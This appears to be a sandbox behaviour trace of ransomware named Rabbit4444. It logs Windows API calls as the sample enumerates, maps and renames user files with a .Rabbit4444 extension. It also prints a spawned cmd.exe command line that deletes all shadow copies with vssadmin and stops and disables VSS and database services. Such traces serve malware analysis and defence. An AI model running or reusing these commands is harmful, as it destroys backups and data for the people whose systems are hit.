lpFindFileData=0x11cdd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3235b602, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x3235b602, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x3235b602, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Rabbit4444.exe") returned -1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".") returned 1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="..") returned 1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="windows") returned -1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="bootmgr") returned 1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="pagefile.sys") returned -1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="boot") returned 1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="ids.txt") returned -1 [0071.534] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="NTUSER.DAT") returned -1 [0071.534] lstrcpyW (in: lpString1=0x11ce984, lpString2="edbres00002.jrs" | out: lpString1="edbres00002.jrs") returned="edbres00002.jrs" [0071.534] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00002.jrs", dwFileAttributes=0x0) returned 1 [0071.538] lstrlenW (lpString="edbres00002.jrs") returned 15 [0071.538] lstrlenW (lpString="Rabbit4444") returned 10 [0071.539] lstrcmpiW (lpString1="s00002.jrs", lpString2="Rabbit4444") returned 1 [0071.539] lstrlenW (lpString=".dll") returned 4 [0071.539] lstrcmpiW (lpString1=".jrs", lpString2=".dll") returned 1 [0071.539] lstrlenW (lpString=".lnk") returned 4 [0071.539] lstrcmpiW (lpString1=".jrs", lpString2=".lnk") returned -1 [0071.539] lstrlenW (lpString=".ini") returned 4 [0071.539] lstrcmpiW (lpString1=".jrs", lpString2=".ini") returned 1 [0071.539] lstrlenW (lpString=".sys") returned 4 [0071.539] lstrcmpiW (lpString1=".jrs", lpString2=".sys") returned -1 [0071.539] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00002.jrs" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbres00002.jrs"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0071.539] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0071.539] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16285004200) returned 1 [0071.539] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=524288) returned 1 [0071.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0071.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0071.539] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x2d0 [0071.540] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0071.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110ae0 [0071.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0071.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110ae0 | out: hHeap=0xe0000) returned 1 [0071.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0071.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0071.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0071.557] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd50 | out: lpPerformanceCount=0x11cbd50*=16286730251) returned 1 [0071.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0071.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0071.557] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.561] CloseHandle (hObject=0x2d0) returned 1 [0071.561] CloseHandle (hObject=0x29c) returned 1 [0071.562] wsprintfW (in: param_1=0x11cc050, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00002.jrs.Rabbit4444") returned 124 [0071.562] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00002.jrs" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbres00002.jrs"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00002.jrs.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbres00002.jrs.rabbit4444"), dwFlags=0x1) returned 1 [0071.562] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=524288 | out: Addend=0xff5a0) returned 2629632 [0071.562] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=17 | out: Addend=0xff5ac) returned 423 [0071.562] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323353b6, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x7a8fdb35, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x224c4f8, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbtmp.log", cAlternateFileName="")) returned 1 [0071.562] lstrcmpiW (lpString1="edbtmp.log", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="Rabbit4444.exe") returned -1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2=".") returned 1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="..") returned 1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="windows") returned -1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="bootmgr") returned 1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="pagefile.sys") returned -1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="boot") returned 1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="ids.txt") returned -1 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="NTUSER.DAT") returned -1 [0071.563] lstrcpyW (in: lpString1=0x11ce984, lpString2="edbtmp.log" | out: lpString1="edbtmp.log") returned="edbtmp.log" [0071.563] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log", dwFileAttributes=0x0) returned 1 [0071.563] lstrlenW (lpString="edbtmp.log") returned 10 [0071.563] lstrlenW (lpString="Rabbit4444") returned 10 [0071.563] lstrcmpiW (lpString1="edbtmp.log", lpString2="Rabbit4444") returned -1 [0071.563] lstrlenW (lpString=".dll") returned 4 [0071.563] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0071.563] lstrlenW (lpString=".lnk") returned 4 [0071.563] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0071.563] lstrlenW (lpString=".ini") returned 4 [0071.563] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0071.563] lstrlenW (lpString=".sys") returned 4 [0071.563] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0071.563] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbtmp.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0071.564] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0071.564] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16287459155) returned 1 [0071.564] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=524288) returned 1 [0071.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0071.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0071.564] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x2d0 [0071.565] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0071.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1108d0 [0071.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0071.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1108d0 | out: hHeap=0xe0000) returned 1 [0071.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0071.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0071.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0071.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0071.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0071.592] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd50 | out: lpPerformanceCount=0x11cbd50*=16290278003) returned 1 [0071.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0071.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0071.592] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.597] CloseHandle (hObject=0x2d0) returned 1 [0071.597] CloseHandle (hObject=0x29c) returned 1 [0071.597] wsprintfW (in: param_1=0x11cc050, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log.Rabbit4444") returned 119 [0071.597] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbtmp.log"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbtmp.log.rabbit4444"), dwFlags=0x1) returned 1 [0071.598] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=524288 | out: Addend=0xff5a0) returned 3153920 [0071.598] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=28 | out: Addend=0xff5ac) returned 440 [0071.598] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3235b602, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x3235b602, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0xc6cd4044, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x600000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IndexedDB.edb", cAlternateFileName="INDEXE~1.EDB")) returned 1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="Rabbit4444.exe") returned -1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2=".") returned 1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="..") returned 1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="windows") returned -1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="bootmgr") returned 1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="pagefile.sys") returned -1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="boot") returned 1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="ids.txt") returned 1 [0071.598] lstrcmpiW (lpString1="IndexedDB.edb", lpString2="NTUSER.DAT") returned -1 [0071.598] lstrcpyW (in: lpString1=0x11ce984, lpString2="IndexedDB.edb" | out: lpString1="IndexedDB.edb") returned="IndexedDB.edb" [0071.598] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\IndexedDB.edb", dwFileAttributes=0x200) returned 1 [0071.598] lstrlenW (lpString="IndexedDB.edb") returned 13 [0071.598] lstrlenW (lpString="Rabbit4444") returned 10 [0071.599] lstrcmpiW (lpString1="exedDB.edb", lpString2="Rabbit4444") returned -1 [0071.599] lstrlenW (lpString=".dll") returned 4 [0071.599] lstrcmpiW (lpString1=".edb", lpString2=".dll") returned 1 [0071.599] lstrlenW (lpString=".lnk") returned 4 [0071.599] lstrcmpiW (lpString1=".edb", lpString2=".lnk") returned -1 [0071.599] lstrlenW (lpString=".ini") returned 4 [0071.599] lstrcmpiW (lpString1=".edb", lpString2=".ini") returned -1 [0071.599] lstrlenW (lpString=".sys") returned 4 [0071.599] lstrcmpiW (lpString1=".edb", lpString2=".sys") returned -1 [0071.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\IndexedDB.edb" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\indexeddb.edb"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0071.599] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0071.599] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16291000564) returned 1 [0071.599] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=6291456) returned 1 [0071.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0071.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0071.599] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x600300, lpName=0x0) returned 0x2d0 [0071.603] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x600000, dwNumberOfBytesToMap=0x300) returned 0x70000 [0071.604] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2f10000 [0071.884] UnmapViewOfFile (lpBaseAddress=0x2f10000) returned 1 [0071.895] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x200000) returned 0x2f10000 [0072.198] UnmapViewOfFile (lpBaseAddress=0x2f10000) Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3d7d9000" os_pid = "0xcb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcdc" cmd_line = "C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x7f0 [0041.433] GetModuleHandleA (lpModuleName=0x0) returned 0xbd0000 [0041.433] __set_app_type (_Type=0x1) [0041.433] __p__fmode () returned 0x77ae3c14 [0041.433] __p__commode () returned 0x77ae49ec [0041.434] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbe6fd0) returned 0x0 [0041.434] __getmainargs (in: _Argc=0xbfd1a4, _Argv=0xbfd1a8, _Env=0xbfd1ac, _DoWildCard=0, _StartInfo=0xbfd1b8 | out: _Argc=0xbfd1a4, _Argv=0xbfd1a8, _Env=0xbfd1ac) returned 0 [0041.434] _onexit (_Func=0xbe8030) returned 0xbe8030 [0041.434] _onexit (_Func=0xbe8040) returned 0xbe8040 [0041.434] _onexit (_Func=0xbe8050) returned 0xbe8050 [0041.434] _onexit (_Func=0xbe8060) returned 0xbe8060 [0041.434] _onexit (_Func=0xbe8070) returned 0xbe8070 [0041.435] _onexit (_Func=0xbe8080) returned 0xbe8080 [0041.436] GetCurrentThreadId () returned 0x7f0 [0041.436] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7f0) returned 0xbc [0041.436] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0041.436] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadUILanguage") returned 0x75ea4f70 [0041.436] SetThreadUILanguage (LangId=0x0) returned 0x2ee0409 [0041.472] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0041.472] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30ff900 | out: phkResult=0x30ff900*=0x0) returned 0x2 [0041.473] VirtualQuery (in: lpAddress=0x30ff90b, lpBuffer=0x30ff8b8, dwLength=0x1c | out: lpBuffer=0x30ff8b8*(BaseAddress=0x30ff000, AllocationBase=0x3000000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0041.473] VirtualQuery (in: lpAddress=0x3000000, lpBuffer=0x30ff8b8, dwLength=0x1c | out: lpBuffer=0x30ff8b8*(BaseAddress=0x3000000, AllocationBase=0x3000000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0041.473] VirtualQuery (in: lpAddress=0x3001000, lpBuffer=0x30ff8b8, dwLength=0x1c | out: lpBuffer=0x30ff8b8*(BaseAddress=0x3001000, AllocationBase=0x3000000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0041.473] VirtualQuery (in: lpAddress=0x3003000, lpBuffer=0x30ff8b8, dwLength=0x1c | out: lpBuffer=0x30ff8b8*(BaseAddress=0x3003000, AllocationBase=0x3000000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0041.473] VirtualQuery (in: lpAddress=0x3100000, lpBuffer=0x30ff8b8, dwLength=0x1c | out: lpBuffer=0x30ff8b8*(BaseAddress=0x3100000, AllocationBase=0x3100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0041.473] GetConsoleOutputCP () returned 0x1b5 [0041.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc03850 | out: lpCPInfo=0xc03850) returned 1 [0041.788] SetConsoleCtrlHandler (HandlerRoutine=0xbf7260, Add=1) returned 1 [0041.788] _get_osfhandle (_FileHandle=1) returned 0x90 [0041.788] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xc0388c | out: lpMode=0xc0388c) returned 1 [0041.829] _get_osfhandle (_FileHandle=0) returned 0x8c [0041.829] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xc03888 | out: lpMode=0xc03888) returned 1 [0041.846] _get_osfhandle (_FileHandle=1) returned 0x90 [0041.846] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0041.860] _get_osfhandle (_FileHandle=1) returned 0x90 [0041.860] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xc03890 | out: lpMode=0xc03890) returned 1 [0042.086] _get_osfhandle (_FileHandle=1) returned 0x90 [0042.086] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0042.113] _get_osfhandle (_FileHandle=0) returned 0x8c [0042.113] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xc03894 | out: lpMode=0xc03894) returned 1 [0042.129] _get_osfhandle (_FileHandle=0) returned 0x8c [0042.129] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0042.191] GetEnvironmentStringsW () returned 0x31157c8* [0042.192] GetProcessHeap () returned 0x3110000 [0042.192] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xaca) returned 0x31162a0 [0042.192] FreeEnvironmentStringsA (penv="A") returned 1 [0042.192] GetProcessHeap () returned 0x3110000 [0042.192] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x4) returned 0x31152a8 [0042.192] GetEnvironmentStringsW () returned 0x31157c8* [0042.192] GetProcessHeap () returned 0x3110000 [0042.192] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xaca) returned 0x3116d78 [0042.193] FreeEnvironmentStringsA (penv="A") returned 1 [0042.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30fe85c | out: phkResult=0x30fe85c*=0xcc) returned 0x0 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x0, lpData=0x30fe868*=0xc5, lpcbData=0x30fe860*=0x1000) returned 0x2 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x4, lpData=0x30fe868*=0x1, lpcbData=0x30fe860*=0x4) returned 0x0 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x0, lpData=0x30fe868*=0x1, lpcbData=0x30fe860*=0x1000) returned 0x2 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x4, lpData=0x30fe868*=0x0, lpcbData=0x30fe860*=0x4) returned 0x0 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x4, lpData=0x30fe868*=0x40, lpcbData=0x30fe860*=0x4) returned 0x0 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x4, lpData=0x30fe868*=0x40, lpcbData=0x30fe860*=0x4) returned 0x0 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x0, lpData=0x30fe868*=0x40, lpcbData=0x30fe860*=0x1000) returned 0x2 [0042.193] RegCloseKey (hKey=0xcc) returned 0x0 [0042.193] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30fe85c | out: phkResult=0x30fe85c*=0xcc) returned 0x0 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x0, lpData=0x30fe868*=0x40, lpcbData=0x30fe860*=0x1000) returned 0x2 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x4, lpData=0x30fe868*=0x1, lpcbData=0x30fe860*=0x4) returned 0x0 [0042.193] 